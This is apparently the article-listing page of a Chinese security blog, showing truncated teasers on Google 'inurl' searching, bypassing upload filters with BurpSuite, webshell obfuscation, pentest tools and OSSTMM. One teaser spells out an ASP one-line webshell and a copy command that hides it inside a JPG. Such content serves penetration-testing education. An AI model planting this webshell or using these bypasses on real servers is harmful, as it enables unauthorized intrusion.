四盘山博客

Google技巧之inurl 2013-01-29 11:27:13分类： 网络与安全前面介绍了google技巧之site和filetype，今天就来说一下inurl。对于初学者来说，可能不知道“URL”是个什么东西。URL = Uniform / Universal Resource Locator，翻译成中文就是“统一资源定位符”，也被称为“网页地址”或

0x01: 前台脚本检测扩展名—绕过原理当用户在客户端选择文件点击上传的时候，客户端还没有向服务器发送任何消息，就对本地文件进行检测来判断是否是可以上传的类型，这种方式称为前台脚本检测扩展名。 1 绕过方法绕过前台脚本检测扩展名，就是将所要上传文件的扩展名更改为符合脚本检测规则的扩展名，通过BurpSuite工具，截取数据包，并将数据包中文件扩展名更改回原来的，达到绕过的目的。 例如:文件名本

未知攻焉知防 — Webshell变形技术集锦 作者： 邮箱投递 2015年09月17日 23:17:02 8030 次阅读来源： 安全狗 本文主要针对webshell变形技术进行一次总体的分析和提炼，欢迎交流。0x1: 利用字符串变形技术改变隐秘特征码传统的shell免杀方式, 利用字符串函数以及字符串操作符, 将字符串进行多次分割、编码、变形后再组装成后门代码然后调用执行.简单的字符串变形

第一种方法： 利用copy命令 详细操作为 1.随便找一张图片 名字改成1.jpg（名字改为1.jpg只是为了方便记忆和输入 文件的后缀随意 只要是图片的格式就可以了） 2.<%eval request(“keio”)%> 存为1.asp（就是一句话木马） 3.copy 1.jpg /b + 1.asp /a 2.jpg 解释一下代码 复制当前目录下的 1.jpg

Python tools for penetration testersIf you are involved in vulnerability research, reverse engineering or penetration testing, I suggest to try out the Python programming language. It has a rich

国外整理的一套在线渗透测试资源合集2015-01-16 16:49:03 来源：360安全播报 阅读：15169次 点赞(0) 收藏(0)分享到：渗透测试阿克西一组很棒的渗透测试资源，包括工具、书籍、会议、杂志和其他的东西目录：在线资源渗透测试资源Shell 脚本资源

原创]OSSTMM安全测试技术概述--开源安全测试方法手册  开源安全测试方法手册OSSTMM 经过多年持续的更新及改善 ，已经成为安全界主流的安全测试技术框架；但国内尚无详细说明文档可供参考。笔者将自己对于OSSTMM的学习及实践心得进行整理，形成了这篇说明文档，供安全同行参考  1   引言为了保障企业信息系统安全,在处理安全问题,进行风险管理时